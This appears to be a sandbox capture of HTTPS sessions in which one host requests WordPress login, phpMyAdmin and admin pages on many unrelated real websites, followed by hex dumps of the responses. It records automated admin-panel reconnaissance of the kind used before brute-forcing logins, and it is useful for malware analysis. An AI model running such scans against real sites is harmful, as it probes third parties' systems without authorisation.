2023-12-22 20:15:01 UTC	16384	IN	Data Raw: 72 69 67 68 74 7d 2e 6d 65 6e 75 6f 2d 72 69 67 68 74 2e 68 65 61 64 65 72 2d 73 74 61 63 6b 3a 6e 6f 74 28 2e 68 65 61 64 65 72 2d 63 65 6e 74 65 72 29 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 5f 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 30 70 78 7d 62 6f 64 79 2e 68 65 61 64 65 72 2d 63 72 65 61 74 69 76 65 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 30 70 78 7d 62 6f 64 79 2e 68 65 61 64 65 72 2d 63 72 65 61 74 69 76 65 2e 68 65 61 64 65 72 2d 6f 70 65 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 35 30 70 78 7d 62 6f 64 79 2e 65 72 72 6f 72 34 30 34 2c 62 6f 64 79 2e 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2c 62 6f 64 79 2e 74 65 6d 70 6c 61 74 65 2d 62 6c 61 6e 6b 2c 62 6f 64 79 2e 75 6e 64 65 72 2d 63 Data Ascii: right}.menuo-right.header-stack:not(.header-center) #Top_bar .menu_wrapper{margin-right:150px}body.header-creative{padding-left:50px}body.header-creative.header-open{padding-left:250px}body.error404,body.under-construction,body.template-blank,body.under-c
2023-12-22 20:15:01 UTC	16384	IN	Data Raw: 69 6f 6e 5f 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 43 32 43 32 43 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 33 66 33 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 20 61 2e 73 6c 69 64 69 6e 67 2d 74 6f 70 2d 63 6f 6e 74 72 6f 6c 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 23 66 33 66 33 66 33 7d 23 53 6c 69 64 69 6e 67 2d 74 6f 70 2e 73 74 2d 63 65 6e 74 65 72 20 61 2e 73 6c 69 64 69 6e 67 2d 74 6f 70 2d 63 6f 6e 74 72 6f 6c 2c 23 53 6c 69 64 69 6e 67 2d 74 6f 70 2e 73 74 2d 6c 65 66 74 20 61 2e 73 6c 69 64 69 6e 67 2d 74 6f 70 2d 63 6f 6e 74 72 6f 6c 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 66 33 66 33 66 33 7d 23 46 6f 6f 74 65 72 7b 62 Data Ascii: ion_bar{background-color:#2C2C2C}#Sliding-top{background-color:#f3f3f3}#Sliding-top a.sliding-top-control{border-right-color:#f3f3f3}#Sliding-top.st-center a.sliding-top-control,#Sliding-top.st-left a.sliding-top-control{border-top-color:#f3f3f3}#Footer{b
2023-12-22 20:15:01 UTC	16384	IN	Data Raw: 6f 6f 74 65 72 20 2e 74 68 65 6d 65 63 6f 6c 6f 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 6d 65 74 61 20 75 6c 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 70 61 67 65 73 20 75 6c 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 72 73 73 20 75 6c 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 6d 66 6e 5f 72 65 63 65 6e 74 5f 63 6f 6d 6d 65 6e 74 73 20 75 6c 20 6c 69 3a 61 66 74 65 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 61 72 63 68 69 76 65 20 75 6c 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 72 65 63 65 6e 74 5f 63 6f 6d 6d 65 6e 74 73 20 75 6c 20 6c 69 3a 61 66 74 65 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 6e 61 Data Ascii: ooter .themecolor,.mfn-footer .widget_meta ul,.mfn-footer .widget_pages ul,.mfn-footer .widget_rss ul,.mfn-footer .widget_mfn_recent_comments ul li:after,.mfn-footer .widget_archive ul,.mfn-footer .widget_recent_comments ul li:after,.mfn-footer .widget_na
2023-12-22 20:15:01 UTC	8209	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 65 77 53 74 72 69 6e 67 20 3d 20 73 74 72 69 6e 67 2e 72 65 70 6c 61 63 65 28 72 65 2c 20 64 65 6c 69 6d 65 74 65 72 20 2b 20 6e 61 6d 65 20 2b 20 22 3d 22 20 2b 20 76 61 6c 75 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6e 65 77 53 74 72 69 6e 67 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 50 6f 77 65 72 65 64 20 62 79 20 57 50 42 61 6b 65 72 79 20 50 61 67 65 20 42 75 69 6c 64 65 72 20 2d 20 64 72 61 67 20 61 6e 64 20 64 72 6f 70 20 70 61 Data Ascii: newString = string.replace(re, delimeter + name + "=" + value); } return newString; } </script><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop pa

Session ID	Source IP	Source Port	Destination IP	Destination Port
159	192.168.2.4	62948	104.26.0.173	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	176	OUT	GET /wp-admin/ HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:00 UTC	835	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/7.4.15 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress X-Frame-Options: SAMEORIGIN Location: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FdadMmOTEa0%2F3FBDnzkd1dHS6HQpZYj0UPLT9%2FCmnHdzB90wN4CbnxqMFdO3Y0zskVQ97QEQjLQXb1%2B%2FD%2Fp8cJ5plSOC9lauiKzqs8bZzHZAmutmvTppd8qxp95uQGJ%2F2hX2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08cb4dd0743e-MIA

Session ID	Source IP	Source Port	Destination IP	Destination Port
160	192.168.2.4	62967	104.21.52.80	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	176	OUT	GET /wp-login.php HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:00 UTC	1345	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:15:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() cf-mitigated: challenge Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZPAKZIYaAlBkowsarDsCe2PbNWxYeBTu%2B8Pvu9VpJMKdP%2FQMgiyxemmq5aWL3Ajrite9dlVzSu%2FfBdrS5O3dNMgP1ayUxK%2FTXDkCtOd3nhzAEWyB3bBZIm%2BubIu5xFYJcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08cb8b2f31d7-MIA
2023-12-22 20:15:00 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 31 38 32 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 1825<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 49 32 36 78 68 62 71 6f 78 31 54 45 38 56 50 4d 6d 54 77 42 71 4c 69 44 50 41 55 39 71 5a 72 61 57 46 35 71 58 43 73 41 69 4a 36 35 4c 66 5f 74 6d 67 43 38 58 54 38 52 73 51 47 76 61 50 59 56 4e 72 37 65 76 78 44 6f 46 4b 35 64 73 6e 70 39 43 50 6d 5a 59 4b 5f 67 4a 54 32 63 74 4c 74 37 4a 59 2d 43 61 5a 48 32 53 4a 35 43 62 68 41 39 72 61 57 43 76 4c 51 37 49 52 42 38 32 71 7a 32 41 56 59 52 52 70 44 6d 52 7a 33 59 63 43 6f 65 48 41 55 32 4a 54 33 38 6b 51 53 57 4a 4c 52 4a 61 35 74 4c 37 66 6a 73 48 79 38 6b 34 33 64 6b 36 4d 76 6d 6f 72 4a 79 52 38 48 51 4c 39 55 33 4c 72 2d 55 45 31 67 6b 65 38 73 76 4d 63 77 6b 4c 70 7a 48 41 4e 36 6a 38 52 61 50 51 70 7a 70 4c 77 4d 6a 79 44 66 69 33 35 4b 36 71 6e 44 39 67 4c 4f 70 38 33 6b 39 59 4a 71 52 74 5a 54 Data Ascii: I26xhbqox1TE8VPMmTwBqLiDPAU9qZraWF5qXCsAiJ65Lf_tmgC8XT8RsQGvaPYVNr7evxDoFK5dsnp9CPmZYK_gJT2ctLt7JY-CaZH2SJ5CbhA9raWCvLQ7IRB82qz2AVYRRpDmRz3YcCoeHAU2JT38kQSWJLRJa5tL7fjsHy8k43dk6MvmorJyR8HQL9U3Lr-UE1gke8svMcwkLpzHAN6j8RaPQpzpLwMjyDfi35K6qnD9gLOp83k9YJqRtZT
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 5f 68 37 50 67 35 74 53 36 32 45 41 4c 74 35 53 45 75 51 68 37 33 76 6a 46 48 62 4c 4b 64 7a 59 53 58 42 6c 47 56 4f 66 61 64 70 55 32 78 48 6f 4e 37 46 53 6d 59 53 73 66 74 44 63 76 45 2d 78 44 48 39 30 43 6d 54 64 78 52 39 55 62 53 37 69 31 78 37 7a 62 72 43 57 5f 67 72 73 6a 54 53 46 53 4c 6d 47 36 74 4d 4b 37 70 69 6e 4a 47 63 4d 4e 71 4b 4d 51 30 6e 32 54 33 2d 34 6d 75 76 39 57 41 53 41 68 6b 78 4a 69 71 4b 68 73 54 51 61 55 50 66 5a 51 73 4a 63 43 46 41 2d 61 78 39 5a 74 47 4e 38 50 6f 61 42 4d 53 78 74 37 31 4c 32 70 59 79 79 4f 4d 45 78 4f 7a 50 6e 56 56 4b 43 32 31 71 7a 61 67 2d 38 6b 4c 67 37 65 43 4b 76 4b 69 7a 65 32 63 56 69 41 55 6f 78 2d 4c 6f 59 63 4f 51 6b 4b 6e 53 38 44 51 46 58 54 34 30 68 48 68 63 4f 49 5f 62 79 58 57 70 34 47 58 5f Data Ascii: _h7Pg5tS62EALt5SEuQh73vjFHbLKdzYSXBlGVOfadpU2xHoN7FSmYSsftDcvE-xDH90CmTdxR9UbS7i1x7zbrCW_grsjTSFSLmG6tMK7pinJGcMNqKMQ0n2T3-4muv9WASAhkxJiqKhsTQaUPfZQsJcCFA-ax9ZtGN8PoaBMSxt71L2pYyyOMExOzPnVVKC21qzag-8kLg7eCKvKize2cViAUox-LoYcOQkKnS8DQFXT40hHhcOI_byXWp4GX_
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 4a 75 62 48 36 49 55 4d 37 45 34 44 43 51 32 7a 6e 4e 68 52 34 4e 33 68 6e 47 52 44 78 43 4e 30 30 68 5f 6e 58 46 79 42 34 42 4d 64 6f 33 6a 5f 4e 44 42 2d 31 71 50 6b 30 68 71 52 64 2d 6c 4b 35 6b 45 38 31 65 5a 51 6d 69 39 51 4c 4e 38 79 33 6a 38 58 6a 45 74 76 48 62 31 22 2c 63 52 71 3a 20 7b 72 75 3a 20 27 61 48 52 30 63 48 4d 36 4c 79 39 6a 59 57 35 75 59 57 4e 73 5a 57 46 79 4c 6d 4e 76 62 53 39 33 63 43 31 73 62 32 64 70 62 69 35 77 61 48 41 3d 27 2c 72 61 3a 20 27 54 57 39 36 61 57 78 73 59 53 38 31 4c 6a 41 67 4b 46 64 70 62 6d 52 76 64 33 4d 67 54 6c 51 67 4e 69 34 77 4f 79 42 79 64 6a 6f 7a 4e 43 34 77 4b 53 42 48 5a 57 4e 72 62 79 38 79 4d 44 45 77 4d 44 45 77 4d 53 42 47 61 58 4a 6c 5a 6d 39 34 4c 7a 4d 30 4c 6a 41 3d 27 2c 72 6d 3a 20 27 52 Data Ascii: JubH6IUM7E4DCQ2znNhR4N3hnGRDxCN00h_nXFyB4BMdo3j_NDB-1qPk0hqRd-lK5kE81eZQmi9QLN8y3j8XjEtvHb1",cRq: {ru: 'aHR0cHM6Ly9jYW5uYWNsZWFyLmNvbS93cC1sb2dpbi5waHA=',ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4wOyBydjozNC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzM0LjA=',rm: 'R
2023-12-22 20:15:00 UTC	713	IN	Data Raw: 68 61 73 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 27 23 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 23 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 6c 69 63 65 28 30 2c 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 65 6e 67 74 68 20 2d 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 Data Ascii: hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;i
2023-12-22 20:15:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
161	192.168.2.4	63036	167.235.0.29	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	186	OUT	GET /wp-login.php HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 35 3a 30 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:15:00 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
2023-12-22 20:15:01 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http

Session ID	Source IP	Source Port	Destination IP	Destination Port
162	192.168.2.4	63352	104.17.71.73	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	393	OUT	GET /admin HTTP/1.1 Host: liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=866846e4a95d698d2be97b497286681aad8ceca0-1703276099; __cf_bm=eY0D4_k8OQFfy9Ngj9OEED_OD7i433V95SWpFgrxatk-1703276099-1-Ad32xSe9y5tGH8uGN7JyLksEBAE/1nxR4yoWSeYxZ0LVDYUL568m6NQnzeumzLRGTwUx8RBLc0RdHXYTmnRpRTQ= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:00 UTC	277	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:00 GMT Content-Length: 0 Connection: close Location: https://www.liberty25.org/admin Strict-Transport-Security: max-age=31536000 Server: cloudflare CF-RAY: 839b08cdfdb12593-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
163	192.168.2.4	63368	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	329	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:00 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:00 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_RxQK801039gr5oXXTblkc/7I0sAskOUmATJZtcDY1xQ/r61C/ohkIzEsr0CPf1IHwHEBlUUqKvb2MRrQrDyPig Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:00 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
164	192.168.2.4	63615	185.162.89.66	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	181	OUT	GET /wp-admin/ HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	571	IN	HTTP/1.1 302 Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, no-store, must-revalidate, max-age=0 x-redirect-by: WordPress location: https://oceanictrailers.com.au/wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 content-type: text/html; charset=UTF-8 content-length: 0 date: Fri, 22 Dec 2023 20:15:01 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Session ID	Source IP	Source Port	Destination IP	Destination Port
165	192.168.2.4	63772	104.24.82.4	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	179	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	635	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:01 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: http://www.thenile.com.au/phpmyadmin via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SQh1%2B%2FdpQkk9Wkh1t0HgrNRlvHmqlamEE3PZE2ocn8dvXAZyrqBjoV6osI6dIpbfDSwnANWSFxuWlbG4g1w0Jh90339l3ZYCemz4NKqIojLA%2Bph6oYcongnw0TmRg47EL1fVtw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08d00d16dac9-MIA
2023-12-22 20:15:01 UTC	251	IN	Data Raw: 66 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 70 68 70 6d 79 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: f5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/phpmyadmin">here</a>.</p></body></html>
2023-12-22 20:15:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
166	192.168.2.4	63804	104.26.0.173	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	246	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
